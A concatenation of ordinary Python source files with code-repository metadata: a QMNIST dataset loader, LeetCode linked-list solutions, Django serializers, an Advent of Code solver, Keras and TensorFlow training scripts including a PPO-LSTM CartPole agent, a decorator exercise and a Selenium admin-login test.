subsets = {
'train': 'train',
'test': 'test',
'test10k': 'test',
'test50k': 'test',
'nist': 'nist'
}
resources = {
'train': [('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-train-images-idx3-ubyte.gz',
'ed72d4157d28c017586c42bc6afe6370'),
('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-train-labels-idx2-int.gz',
'0058f8dd561b90ffdd0f734c6a30e5e4')],
'test': [('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-test-images-idx3-ubyte.gz',
'1394631089c404de565df7b7aeaf9412'),
('https://raw.githubusercontent.com/facebookresearch/qmnist/master/qmnist-test-labels-idx2-int.gz',
'5b5b05890a5e13444e108efe57b788aa')],
'nist': [('https://raw.githubusercontent.com/facebookresearch/qmnist/master/xnist-images-idx3-ubyte.xz',
'7f124b3b8ab81486c9d8c2749c17f834'),
('https://raw.githubusercontent.com/facebookresearch/qmnist/master/xnist-labels-idx2-int.xz',
'5ed0e788978e45d4a8bd4b7caec3d79d')]
}
classes = ['0 - zero', '1 - one', '2 - two', '3 - three', '4 - four',
'5 - five', '6 - six', '7 - seven', '8 - eight', '9 - nine']
def __init__(self, root, what=None, compat=True, train=True, **kwargs):
if what is None:
what = 'train' if train else 'test'
self.what = verify_str_arg(what, "what", tuple(self.subsets.keys()))
self.compat = compat
self.data_file = what + '.pt'
self.training_file = self.data_file
self.test_file = self.data_file
super(QMNIST, self).__init__(root, train, **kwargs)
def download(self):
"""Download the QMNIST data if it doesn't exist in processed_folder already.
Note that we only download what has been asked for (argument 'what').
"""
if self._check_exists():
return
os.makedirs(self.raw_folder, exist_ok=True)
os.makedirs(self.processed_folder, exist_ok=True)
split = self.resources[self.subsets[self.what]]
files = []
# download data files if not already there
for url, md5 in split:
filename = url.rpartition('/')[2]
file_path = os.path.join(self.raw_folder, filename)
if not os.path.isfile(file_path):
download_url(url, root=self.raw_folder, filename=filename, md5=md5)
files.append(file_path)
# process and save as torch files
print('Processing...')
data = read_sn3_pascalvincent_tensor(files[0])
assert(data.dtype == torch.uint8)
assert(data.ndimension() == 3)
targets = read_sn3_pascalvincent_tensor(files[1]).long()
assert(targets.ndimension() == 2)
if self.what == 'test10k':
data = data[0:10000, :, :].clone()
targets = targets[0:10000, :].clone()
if self.what == 'test50k':
data = data[10000:, :, :].clone()
targets = targets[10000:, :].clone()
with open(os.path.join(self.processed_folder, self.data_file), 'wb') as f:
torch.save((data, targets), f)
def __getitem__(self, index):
# redefined to handle the compat flag
img, target = self.data[index], self.targets[index]
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
if self.compat:
target = int(target[0])
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def extra_repr(self):
return "Split: {}".format(self.what)
def get_int(b):
return int(codecs.encode(b, 'hex'), 16)
def open_maybe_compressed_file(path):
"""Return a file object that possibly decompresses 'path' on the fly.
Decompression occurs when argument `path` is a string and ends with '.gz' or '.xz'.
"""
if not isinstance(path, torch._six.string_classes):
return path
if path.endswith('.gz'):
import gzip
return gzip.open(path, 'rb')
if path.endswith('.xz'):
import lzma
return lzma.open(path, 'rb')
return open(path, 'rb')
def read_sn3_pascalvincent_tensor(path, strict=True):
"""Read a SN3 file in "Pascal Vincent" format (Lush file 'libidx/idx-io.lsh').
Argument may be a filename, compressed filename, or file object.
"""
# typemap
if not hasattr(read_sn3_pascalvincent_tensor, 'typemap'):
read_sn3_pascalvincent_tensor.typemap = {
8: (torch.uint8, np.uint8, np.uint8),
9: (torch.int8, np.int8, np.int8),
11: (torch.int16, np.dtype('>i2'), 'i2'),
12: (torch.int32, np.dtype('>i4'), 'i4'),
13: (torch.float32, np.dtype('>f4'), 'f4'),
14: (torch.float64, np.dtype('>f8'), 'f8')}
# read
with open_maybe_compressed_file(path) as f:
data = f.read()
# parse
magic = get_int(data[0:4])
nd = magic % 256
ty = magic // 256
assert nd >= 1 and nd <= 3
assert ty >= 8 and ty <= 14
m = read_sn3_pascalvincent_tensor.typemap[ty]
s = [get_int(data[4 * (i + 1): 4 * (i + 2)]) for i in range(nd)]
parsed = np.frombuffer(data, dtype=m[1], offset=(4 * (nd + 1)))
assert parsed.shape[0] == np.prod(s) or not strict
return torch.from_numpy(parsed.astype(m[2], copy=False)).view(*s)
def read_label_file(path):
with open(path, 'rb') as f:
x = read_sn3_pascalvincent_tensor(f, strict=False)
assert(x.dtype == torch.uint8)
assert(x.ndimension() == 1)
return x.long()
def read_image_file(path):
with open(path, 'rb') as f:
x = read_sn3_pascalvincent_tensor(f, strict=False)
assert(x.dtype == torch.uint8)
assert(x.ndimension() == 3)
return x
| [
"noreply@github.com"
] | noreply@github.com |
6c351742ccd9c3c58c9a7048ff2f0434e916f76c | 04ae1836b9bc9d73d244f91b8f7fbf1bbc58ff29 | /019/Solution.py | 77b23c403e0c7749e27a5927c92d8dbf83f175dd | [] | no_license | zhangruochi/leetcode | 6f739fde222c298bae1c68236d980bd29c33b1c6 | cefa2f08667de4d2973274de3ff29a31a7d25eda | refs/heads/master | 2022-07-16T23:40:20.458105 | 2022-06-02T18:25:35 | 2022-06-02T18:25:35 | 78,989,941 | 14 | 6 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | """
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
Follow up:
Could you do this in one pass?
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
dummy = ListNode(0)
dummy.next = head
slow = quick = dummy
while quick:
if n >= 0:
n -= 1
quick = quick.next
else:
quick = quick.next
slow = slow.next
slow.next = slow.next.next
return dummy.next
class Solution(object):
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
dummy = ListNode(0)
dummy.next = head
count, p = 0, dummy
while p:
count += 1
p = p.next
k = count - n - 1
p = dummy
while k:
p = p.next
k -= 1
p.next = p.next.next
return dummy.next
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
    """Length-based removal of the n-th node from the end (type-hinted)."""

    def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
        # Measure the list length.
        length = 0
        node = head
        while node:
            length += 1
            node = node.next
        # 0-based index (from the front) of the node to delete.
        target = length - n
        sentinel = cur = ListNode()
        sentinel.next = head
        for _ in range(target):
            cur = cur.next
        cur.next = cur.next.next
        return sentinel.next
| [
"zrc720@gmail.com"
] | zrc720@gmail.com |
f06e528e1260ebc5a1753691b630761e596736d9 | 0f764a53f94ba7ad04094323a770237f2f2f1d2e | /api/serializers.py | 1464af362f0ad0255df0ef2e96befa35837f96e8 | [] | no_license | prafullkumar41/ProductApi | c302d60f526e2cb5e1cbb04bed19c88ce220a945 | 873ce2fc52cb8f72109ab857b1b90c2406147a0d | refs/heads/master | 2022-12-16T22:39:23.790371 | 2020-09-12T12:18:10 | 2020-09-12T12:18:10 | 294,936,100 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | from rest_framework import serializers
from .models import Movie, Rating
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
class UserSerializer(serializers.ModelSerializer):
    """Serializer for Django auth users; never exposes the password."""

    class Meta:
        model = User
        fields = ('id' ,'username', 'password')
        # write_only keeps the password out of serialized API responses.
        extra_kwargs = {'password': {'write_only': True, 'required': True}}

    def create(self, validated_data):
        # create_user() hashes the password (a plain create() would store it
        # in clear text); every new user also gets a DRF auth token.
        user = User.objects.create_user(**validated_data)
        Token.objects.create(user=user)
        return user
class MovieSerializer(serializers.ModelSerializer):
    """Serializes a Movie including its aggregate rating fields."""

    class Meta:
        model = Movie
        fields = ('id' ,'title', 'description', 'no_of_ratings', 'avg_rating')
class RatingSerializer(serializers.ModelSerializer):
    """Serializes one user's star rating for a movie."""

    class Meta:
        model = Rating
        fields = ('id', 'movie', 'stars', 'user')
"prafullkumar41@gmail.com"
] | prafullkumar41@gmail.com |
4a027ec74eb4d35e5ab9f5de6328565278802070 | 4e77e00512d56ed7a66be0a6bb9eac428bef3a24 | /day16.py | 0bc37349d875da393d2b989dfc00a365d2452f30 | [] | no_license | russford/advent2020 | 54b38c3280a4e7fc7536dc3f8b8915cfba90daf3 | 585f1f07446130c60616aca61e5a87df01ef3689 | refs/heads/master | 2023-02-20T07:32:59.818544 | 2021-01-21T17:14:08 | 2021-01-21T17:14:08 | 317,603,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,257 | py | import re
def part1(rules, my_ticket, tickets):
    """AoC 2020 day 16 part 1: the ticket scanning error rate.

    `rules` is the raw rules text ("field: a-b or c-d" per line) and
    `tickets` the raw nearby-tickets section; `my_ticket` is unused here.
    Prints the error rate and also returns it (callers previously ignored
    the implicit None, so returning the value is backward compatible).
    """
    numbers = list(map(int, re.findall(r"\d+", rules)))
    # Consecutive number pairs form the inclusive (low, high) rule ranges.
    brackets = list(zip(numbers[::2], numbers[1::2]))
    invalids = [
        v for v in map(int, re.findall(r"\d+", tickets))
        if not any(low <= v <= high for low, high in brackets)
    ]
    total = sum(invalids)
    print(total)
    return total
def is_valid(ticket, brackets):
    """True when every field value falls inside at least one rule range."""
    for value in ticket:
        if not any(low <= value <= high for low, high in brackets):
            return False
    return True
def get_valid_tickets(rules, my_ticket, tickets):
    """Parse my ticket plus the nearby tickets and keep only valid ones.

    Both ticket sections have a header line that is skipped; each remaining
    line is a comma-separated list of ints. A ticket survives when every
    field satisfies at least one rule range.
    """
    ticket_lines = my_ticket.split('\n')[1:] + tickets.split('\n')[1:]
    all_tickets = [[int(v) for v in line.split(',')] for line in ticket_lines]
    numbers = [int(m) for m in re.findall(r"\d+", rules)]
    brackets = list(zip(numbers[::2], numbers[1::2]))
    return [t for t in all_tickets if is_valid(t, brackets)]
def build_rules(rules_list):
    """Map each field name to its four range bounds [a, b, c, d]."""
    rules = {}
    for groups in re.findall(r"(.+): (\d+)-(\d+) or (\d+)-(\d+)", rules_list):
        rules[groups[0]] = [int(bound) for bound in groups[1:]]
    return rules
def check_range(v, rule):
    """True when v lies inside either inclusive range of rule = [a, b, c, d]."""
    try:
        return rule[0] <= v <= rule[1] or rule[2] <= v <= rule[3]
    except Exception:
        # Debug aid for malformed rules; bare `raise` re-raises the original
        # exception without rewriting its traceback (the old `raise e` did).
        print(v, rule)
        raise
def part2(rules_list, my_ticket, tickets):
    """AoC 2020 day 16 part 2: deduce the field order of the columns.

    Prints and returns the product of my ticket's "departure*" fields
    (returning the value is new and backward compatible; the original
    returned None, which all callers ignored). Fixes the original loop
    variable `list`, which shadowed the builtin.
    """
    rules = build_rules(rules_list)
    tickets = get_valid_tickets(rules_list, my_ticket, tickets)
    # For each field, collect every column index whose values all satisfy it.
    matchup = {}
    for field in rules.keys():
        matchup[field] = []
        for i in range(len(rules)):
            if all(check_range(t[i], rules[field]) for t in tickets):
                matchup[field].append(i)
    # Repeatedly pin any field with exactly one candidate column and remove
    # that column from every other field's candidates.
    matches = {}
    while len(matches) < len(rules):
        for field, poss in matchup.items():
            if len(poss) == 1:
                match = poss[0]
                matches[field] = match
                for candidates in matchup.values():
                    if match in candidates:
                        candidates.remove(match)
    # My ticket is the first entry of the combined valid-ticket list.
    product = 1
    for field, column in matches.items():
        if field.startswith("departure"):
            print(field, tickets[0][column])
            product *= tickets[0][column]
    print(product)
    return product
# Input file has three blank-line-separated sections: rules, your ticket,
# nearby tickets. Run both puzzle parts on it.
with open ("day16.txt", "r") as f:
    rules_list, my_ticket, tickets = f.read().split('\n\n')
part1(rules_list, my_ticket, tickets)
part2(rules_list, my_ticket, tickets)
| [
"russford@gmail.com"
] | russford@gmail.com |
1a89ac9ba7ddc69c93081fde340c991f34163b5b | cbe7f16751b5dd258cff6c1edb6c07f8b91529dd | /main.py | 025dc6265394fa9b4c7e99ca1a67a9692684e84a | [] | no_license | ViktoryLoktionova/Bidirectional_RNN | 4572f52d78388983234c6c6fe76955126dac8e5d | 22314b7cf799bd53375e9711fed2932f8749f111 | refs/heads/master | 2023-06-30T23:47:18.924718 | 2021-08-03T14:24:23 | 2021-08-03T14:24:23 | 392,339,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,776 | py | import numpy as np
import re
from tensorflow.keras.layers import Dense, SimpleRNN, Input
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.text import Tokenizer
import numpy as np
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense, GRU, Input, Dropout, Bidirectional
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
N = 10000 #build a sine wave with random noise
data = np.array([np.sin(x/20)for x in range (N)])+ 0.1*np.random.randn(N)
plt.plot(data[:100])
off = 3 #build the training set; `off` samples are taken on each side of the target
length = off*2+1
X= np.array([np.diag(np.hstack((data[i:i+off], data[i+off+1:i+length]))) for i in range(N-length)]) #network inputs
Y= data[off:N-off-1] #target outputs. np.diag builds a diagonal matrix from the window.
print(X.shape, Y.shape, sep ='\n')
model = Sequential()
model.add(Input((length-1, length-1)))
model.add(Bidirectional(GRU(2)) ) #bidirectional recurrent layer
model.add(Dense(1, activation='linear'))
model.summary()
model.compile(loss = 'mean_squared_error', optimizer = Adam(0.01)) #compile the network
histiry = model.fit(X, Y, batch_size=32, epochs=10)
M = 200 #predict 200 samples
XX = np.zeros(M)
XX[:off] = data[:off]
for i in range (M-off-1):
    x = np.diag ( np.hstack( (XX[i:i+off], data[i+off+1:i+length])) ) #build the network input window
    x = np.expand_dims(x, axis=0)
    y = model.predict(x)
    XX[i+off] = y
plt.plot(XX[:M])
plt.plot(data[:M]) | [
"loktionova_viktory@mail.ru"
] | loktionova_viktory@mail.ru |
5f2ca36e61acddfdb4039e5b07fd900e04f868a8 | 332ba026303202f4aaf61dd88be55bd621e3c255 | /script_inspect_ckpt.py | 8877013ce9d46e67f459cda444892ff736ee566d | [
"Apache-2.0"
] | permissive | Li-Ming-Fan/pointer-generator-refactored | ea1d07cb0cca6c215524af057a80f32f51d2e4f2 | e4b2b62a791baf8373ce583850319f552f2f94e0 | refs/heads/master | 2020-07-21T08:39:45.601255 | 2020-01-06T14:42:17 | 2020-01-06T14:42:17 | 206,800,113 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,485 | py | """
Simple script that checks if a checkpoint is corrupted with any inf/NaN values.
Run like this:
python inspect_checkpoint.py model.12345
"""
import tensorflow as tf
import sys
import numpy as np
if __name__ == '__main__':
    """
    """
    if len(sys.argv) != 2:
        raise Exception("Usage: python inspect_checkpoint.py <file_name>\nNote: Do not include the .data .index or .meta part of the model checkpoint in file_name.")
    #
    file_name = sys.argv[1]
    #
    # Read every tensor in the checkpoint and bucket its name by whether the
    # values are all finite, all inf/NaN, or a mixture.
    reader = tf.train.NewCheckpointReader(file_name)
    var_to_shape_map = reader.get_variable_to_shape_map()
    finite = []
    all_infnan = []
    some_infnan = []
    for key in sorted(var_to_shape_map.keys()):
        tensor = reader.get_tensor(key)
        if np.all(np.isfinite(tensor)):
            finite.append(key)
        else:
            if not np.any(np.isfinite(tensor)):
                all_infnan.append(key)
            else:
                some_infnan.append(key)
    # Report the three buckets, then an overall pass/fail verdict.
    print("\nFINITE VARIABLES:")
    for key in finite: print(key)
    print("\nVARIABLES THAT ARE ALL INF/NAN:")
    for key in all_infnan: print(key)
    print("\nVARIABLES THAT CONTAIN SOME FINITE, SOME INF/NAN VALUES:")
    for key in some_infnan: print(key)
    if not all_infnan and not some_infnan:
        print("CHECK PASSED: checkpoint contains no inf/NaN values")
    else:
        print("CHECK FAILED: checkpoint contains some inf/NaN values")
| [
"li_m_f@163.com"
] | li_m_f@163.com |
cb71b7819ba6ef1dbdd577e63c2dd7dca07bdb3b | dbf770eef8233f7da1850309cc4b7145bd8d67f1 | /PYTHON-ADVANCED-SEPT-2020/PYTHON OOP/09_DECORATORS/LAB/passing_args.py | 7601d8b2620bd3eaac6ce6d8c978e2ae2f3870b9 | [] | no_license | vasil-panoff/PYTHON-ADVANCED-SEPT-2020_repo | 610a37d1681ce9d0aa86628523620e1571b438dd | c63434f91de42d2f1241b6d76a96c7c63711c1d0 | refs/heads/master | 2023-03-22T07:44:53.620221 | 2021-03-15T20:42:14 | 2021-03-15T20:42:14 | 309,829,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | def repeat(n):
    def decorator(func):
        # Wrapper calls the decorated function n times per invocation;
        # `n` is closed over from the enclosing repeat(). Return values
        # of the wrapped function are discarded.
        def wrapper(*args, **kwargs):
            for _ in range(n):
                func(*args, **kwargs)
        return wrapper
return decorator
@repeat(4)
def say_hi():
    # Decorated with repeat(4): a single call prints "Hello" four times.
    print("Hello")
| [
"73856636+vasil-panoff@users.noreply.github.com"
] | 73856636+vasil-panoff@users.noreply.github.com |
90e3657df6220725bd0d4318738ca8eefadda3b0 | c31fd5ff52a0cf5bdf85a631914dfbafbfd68bb9 | /ppo_lstm2.py | c69418adadcf8bd0b9ef3243688fe2d3bdb79ef1 | [] | no_license | ziaoang/RlTest | 4307b3d7f58dd6f81de1f7cd17298c517c274564 | 4d81e69b27023d008ca081063c7a154fb5b2451c | refs/heads/main | 2023-08-05T01:32:14.288041 | 2021-10-09T02:58:32 | 2021-10-09T02:58:32 | 403,208,412 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,015 | py | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import gym
import scipy.signal
import time
def discounted_cumulative_sums(x, discount):
    """Discounted cumulative sums along axis 0.

    out[i] = x[i] + discount * out[i + 1]; used for rewards-to-go and
    GAE advantage estimates.
    """
    out = np.array(x, dtype=float)
    acc = 0.0
    # Accumulate from the end backwards; same recurrence the original
    # expressed via scipy.signal.lfilter on the reversed sequence.
    for i in range(len(out) - 1, -1, -1):
        acc = out[i] + discount * acc
        out[i] = acc
    return out
class Queue(object):
    """Fixed-capacity FIFO window of equal-length 1-D arrays.

    Always reports a full window: missing leading entries are zero rows,
    and the window is returned with a leading batch axis of size 1.
    """

    def __init__(self, size):
        self.size = size
        self.data_list = []

    def push(self, data):
        """Append one entry (evicting the oldest past capacity) and return the window."""
        assert len(self.data_list) <= self.size
        self.data_list.append(data)
        if len(self.data_list) > self.size:
            self.data_list.pop(0)
        return self._get()

    def _get(self):
        assert len(self.data_list) <= self.size
        # Zero-pad at the front so the newest entry is always last.
        missing = self.size - len(self.data_list)
        width = self.data_list[0].shape[0]
        rows = [np.zeros(width) for _ in range(missing)]
        rows.extend(self.data_list)
        return np.expand_dims(np.array(rows), 0)
class Buffer(object):
    """On-policy trajectory storage for PPO.

    Holds up to `size` steps of (observation window, action, reward, value,
    log-probability) and computes GAE(lambda) advantages plus discounted
    rewards-to-go per finished trajectory.
    """
    def __init__(self, timestep, observation_dimensions, size, gamma=0.99, lam=0.95):
        # Buffer initialization; observations are windows of `timestep` frames.
        self.observation_buffer = np.zeros(
            (size, timestep, observation_dimensions), dtype=np.float32
        )
        self.action_buffer = np.zeros(size, dtype=np.int32)
        self.advantage_buffer = np.zeros(size, dtype=np.float32)
        self.reward_buffer = np.zeros(size, dtype=np.float32)
        self.return_buffer = np.zeros(size, dtype=np.float32)
        self.value_buffer = np.zeros(size, dtype=np.float32)
        self.logprobability_buffer = np.zeros(size, dtype=np.float32)
        self.gamma, self.lam = gamma, lam
        # pointer: next write slot; trajectory_start_index: first slot of
        # the trajectory currently being collected.
        self.pointer, self.trajectory_start_index = 0, 0
    def store(self, observation, action, reward, value, logprobability):
        # Append one step of agent-environment interaction
        self.observation_buffer[self.pointer] = observation
        self.action_buffer[self.pointer] = action
        self.reward_buffer[self.pointer] = reward
        self.value_buffer[self.pointer] = value
        self.logprobability_buffer[self.pointer] = logprobability
        self.pointer += 1
    def finish_trajectory(self, last_value=0):
        # Finish the trajectory by computing advantage estimates and rewards-to-go.
        # `last_value` bootstraps a trajectory cut off before terminating.
        path_slice = slice(self.trajectory_start_index, self.pointer)
        rewards = np.append(self.reward_buffer[path_slice], last_value)
        values = np.append(self.value_buffer[path_slice], last_value)
        # TD residuals: delta_t = r_t + gamma * V(s_{t+1}) - V(s_t).
        deltas = rewards[:-1] + self.gamma * values[1:] - values[:-1]
        # GAE(lambda) advantages are discounted sums of the deltas.
        self.advantage_buffer[path_slice] = discounted_cumulative_sums(
            deltas, self.gamma * self.lam
        )
        self.return_buffer[path_slice] = discounted_cumulative_sums(
            rewards, self.gamma
        )[:-1]
        self.trajectory_start_index = self.pointer
    def get(self):
        # Get all data of the buffer and normalize the advantages
        # (zero mean, unit variance) before the policy update.
        self.pointer, self.trajectory_start_index = 0, 0
        advantage_mean, advantage_std = (
            np.mean(self.advantage_buffer),
            np.std(self.advantage_buffer),
        )
        self.advantage_buffer = (self.advantage_buffer - advantage_mean) / advantage_std
        return (
            self.observation_buffer,
            self.action_buffer,
            self.advantage_buffer,
            self.return_buffer,
            self.logprobability_buffer,
        )
def mlp(x, lstm_size, sizes, activation=tf.tanh, output_activation=None):
    """LSTM encoder followed by a dense head; `sizes[-1]` is the output width."""
    hidden = layers.LSTM(lstm_size)(x)
    for units in sizes[:-1]:
        hidden = layers.Dense(units=units, activation=activation)(hidden)
    return layers.Dense(units=sizes[-1], activation=output_activation)(hidden)
def logprobabilities(logits, a):
    # Compute the log-probabilities of taking actions a by using the logits
    # (i.e. the output of the actor). The one-hot width comes from the
    # module-level `num_actions`.
    logprobabilities_all = tf.nn.log_softmax(logits)
    logprobability = tf.reduce_sum(
        tf.one_hot(a, num_actions) * logprobabilities_all, axis=1
    )
    return logprobability
# Sample one action from the actor's categorical policy (module-level `actor`);
# returns both the raw logits and the sampled action.
@tf.function
def sample_action(observation):
    logits = actor(observation)
    action = tf.squeeze(tf.random.categorical(logits, 1), axis=1)
    return logits, action
# Train the policy by maximizing the PPO-Clip objective
@tf.function
def train_policy(observation_buffer, action_buffer, logprobability_buffer, advantage_buffer):
    """One gradient step on the PPO clipped surrogate; returns a KL estimate.

    Uses the module-level `actor`, `policy_optimizer` and `clip_ratio`.
    """
    with tf.GradientTape() as tape:  # Record operations for automatic differentiation.
        # Probability ratio pi_new(a|s) / pi_old(a|s), computed in log space.
        ratio = tf.exp(
            logprobabilities(actor(observation_buffer), action_buffer)
            - logprobability_buffer
        )
        # Clipped branch of the surrogate: advantage scaled by (1 +/- clip_ratio).
        min_advantage = tf.where(
            advantage_buffer > 0,
            (1 + clip_ratio) * advantage_buffer,
            (1 - clip_ratio) * advantage_buffer,
        )
        policy_loss = -tf.reduce_mean(
            tf.minimum(ratio * advantage_buffer, min_advantage)
        )
    policy_grads = tape.gradient(policy_loss, actor.trainable_variables)
    policy_optimizer.apply_gradients(zip(policy_grads, actor.trainable_variables))
    # Approximate KL between old and new policy; the caller uses it to stop early.
    kl = tf.reduce_mean(
        logprobability_buffer
        - logprobabilities(actor(observation_buffer), action_buffer)
    )
    kl = tf.reduce_sum(kl)
    return kl
# Train the value function by regression on mean-squared error
@tf.function
def train_value_function(observation_buffer, return_buffer):
    """One MSE regression step fitting the module-level `critic` to the returns."""
    with tf.GradientTape() as tape:  # Record operations for automatic differentiation.
        value_loss = tf.reduce_mean((return_buffer - critic(observation_buffer)) ** 2)
    value_grads = tape.gradient(value_loss, critic.trainable_variables)
    value_optimizer.apply_gradients(zip(value_grads, critic.trainable_variables))
# Hyperparameters of the PPO algorithm
steps_per_epoch = 4000
epochs = 30
gamma = 0.99  # reward discount factor
clip_ratio = 0.2  # PPO surrogate clipping range
policy_learning_rate = 3e-4
value_function_learning_rate = 1e-3
train_policy_iterations = 80
train_value_iterations = 80
lam = 0.97  # GAE lambda
target_kl = 0.01  # policy updates stop early past 1.5 * target_kl
hidden_sizes = (64, 64)
# True if you want to render the environment
render = False
# Initialize the environment and get the dimensionality of the
# observation space and the number of possible actions
env = gym.make("CartPole-v0")
observation_dimensions = env.observation_space.shape[0]
num_actions = env.action_space.n
timestep = 8  # length of the observation window fed to the LSTM
lstm_size = 64
# Initialize the buffer
buffer = Buffer(timestep, observation_dimensions, steps_per_epoch)
# Initialize the actor and the critic as keras models; both consume a
# (timestep, observation_dimensions) window of recent observations.
observation_input = keras.Input(shape=(timestep, observation_dimensions), dtype=tf.float32)
logits = mlp(observation_input, lstm_size, list(hidden_sizes) + [num_actions], tf.tanh, None)
actor = keras.Model(inputs=observation_input, outputs=logits)
value = tf.squeeze(
    mlp(observation_input, lstm_size, list(hidden_sizes) + [1], tf.tanh, None), axis=1
)
critic = keras.Model(inputs=observation_input, outputs=value)
actor.summary()
critic.summary()
# Initialize the policy and the value function optimizers
policy_optimizer = keras.optimizers.Adam(learning_rate=policy_learning_rate)
value_optimizer = keras.optimizers.Adam(learning_rate=value_function_learning_rate)
# Initialize the observation, episode return and episode length
observation, episode_return, episode_length = env.reset(), 0, 0
observations = Queue(timestep)
# Iterate over the number of epochs
for epoch in range(epochs):
    # Initialize the sum of the returns, lengths and number of episodes for each epoch
    sum_return = 0
    sum_length = 0
    num_episodes = 0
    # Iterate over the steps of each epoch
    for t in range(steps_per_epoch):
        if render:
            env.render()
        # Get the logits, action, and take one step in the environment.
        # The raw observation is pushed through the sliding window first.
        # observation = observation.reshape(1, -1)
        adv_observation = observations.push(observation)
        logits, action = sample_action(adv_observation)
        observation_new, reward, done, _ = env.step(action[0].numpy())
        episode_return += reward
        episode_length += 1
        # Get the value and log-probability of the action
        value_t = critic(adv_observation)
        logprobability_t = logprobabilities(logits, action)
        # Store obs, act, rew, v_t, logp_pi_t
        buffer.store(adv_observation, action, reward, value_t, logprobability_t)
        # Update the observation
        observation = observation_new
        # Finish trajectory if reached to a terminal state
        terminal = done
        if terminal or (t == steps_per_epoch - 1):
            # Bootstrap with the critic's value if the episode was cut off
            # by the epoch boundary rather than truly finished.
            last_value = 0 if done else critic(observations.push(observation))
            buffer.finish_trajectory(last_value)
            sum_return += episode_return
            sum_length += episode_length
            num_episodes += 1
            observation, episode_return, episode_length = env.reset(), 0, 0
            observations = Queue(timestep)
    # Get values from the buffer
    (
        observation_buffer,
        action_buffer,
        advantage_buffer,
        return_buffer,
        logprobability_buffer,
    ) = buffer.get()
    # Update the policy and implement early stopping using KL divergence
    for _ in range(train_policy_iterations):
        kl = train_policy(
            observation_buffer, action_buffer, logprobability_buffer, advantage_buffer
        )
        if kl > 1.5 * target_kl:
            # Early Stopping
            break
    # Update the value function
    for _ in range(train_value_iterations):
        train_value_function(observation_buffer, return_buffer)
    # Print mean return and length for each epoch
    print(f" Epoch: {epoch + 1}. Mean Return: {sum_return / num_episodes}. Mean Length: {sum_length / num_episodes}")
| [
"lcn6767@corp.netease.com"
] | lcn6767@corp.netease.com |
0ff0a0f62d90db80fcdadf06d3684dbbad7a0af1 | bae76a8e1d2fdefdd660f44b770ddbdb8184d682 | /les_1/test1.py | a047e6ff503f70e1f25cad5ff399132ebd7dd1a3 | [] | no_license | a-chernyshova/selenium_test_practice | 0024f32d1022bfb6f1fbdb87ae99b907a6dffa7c | 927b99e9a43f6e453348f9cd1db67d9e59b003bf | refs/heads/master | 2021-06-18T07:52:10.098499 | 2017-07-07T20:02:07 | 2017-07-07T20:02:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,040 | py | import pytest
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# Admin panel under test and its login credentials.
URL = 'http://localhost:8080/litecart/admin'
LOGIN = 'admin'
PASSWORD = 'admin'
def login(url, login, password):
    """Open the admin login page in Firefox and sign in.

    Stores the driver in the module-level `browser` (so the __main__
    teardown can always close it) and also returns it. The commented
    lines below are alternative browser/binary configurations.
    """
    global browser
    browser = webdriver.Firefox()
    #browser = webdriver.Chrome()
    #browser = webdriver.Ie()
    #browser = webdriver.Opera()
    #browser = webdriver.Edge()
    #browser = webdriver.Firefox(capabilities={"marionette": False}) # old fashion
    #browser = webdriver.Firefox(firefox_binary="c:\\Program Files\\Firefox45\\firefox.exe",
    #                            capabilities={"marionette": False})
    #browser = webdriver.Firefox(firefox_binary="c:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe",
    #                            capabilities={"marionette": True})
    #browser = webdriver.Firefox(firefox_binary='C:\\Program Files(x86)\\Firefox Developer Edition\\firefox.exe')
    #browser = webdriver.Firefox(firefox_binary="c:\\Program Files(x86)\\Nightly\\firefox.exe")
    browser.get(url)
    browser.find_element_by_name('username').send_keys(login)
    browser.find_element_by_name('password').send_keys(password)
    browser.find_element_by_name('login').click()
    return browser
def work_with_coockies(browser):
    # Dump the current cookies, clear them all, dump again, then reload
    # the page so the session state reflects the cleared cookies.
    print(browser.get_cookies())
    browser.delete_all_cookies()
    print(browser.get_cookies())
    browser.refresh()
def close(browser):
    # End the WebDriver session and shut the browser down.
    browser.quit()
@pytest.fixture
def driver(request):
    """Pytest fixture: a fresh Firefox driver, quit automatically on teardown."""
    wd = webdriver.Firefox()
    print(wd.capabilities)
    request.addfinalizer(wd.quit)
    return wd
def test_first(driver):
    # Search Google for "webdriver" and wait until the (localized Russian)
    # results-page title appears.
    driver.get("http://www.google.com/")
    driver.find_element_by_name("q").send_keys("webdriver")
    driver.find_element_by_name("btnG").click()
    WebDriverWait(driver, 10).until(EC.title_is("webdriver - Поиск в Google"))
if __name__ == '__main__':
    # Manual smoke test: log in, exercise the cookie helpers, and always
    # close the (module-global) browser even if the steps fail.
    try:
        work_with_coockies(login(URL, LOGIN, PASSWORD))
    finally:
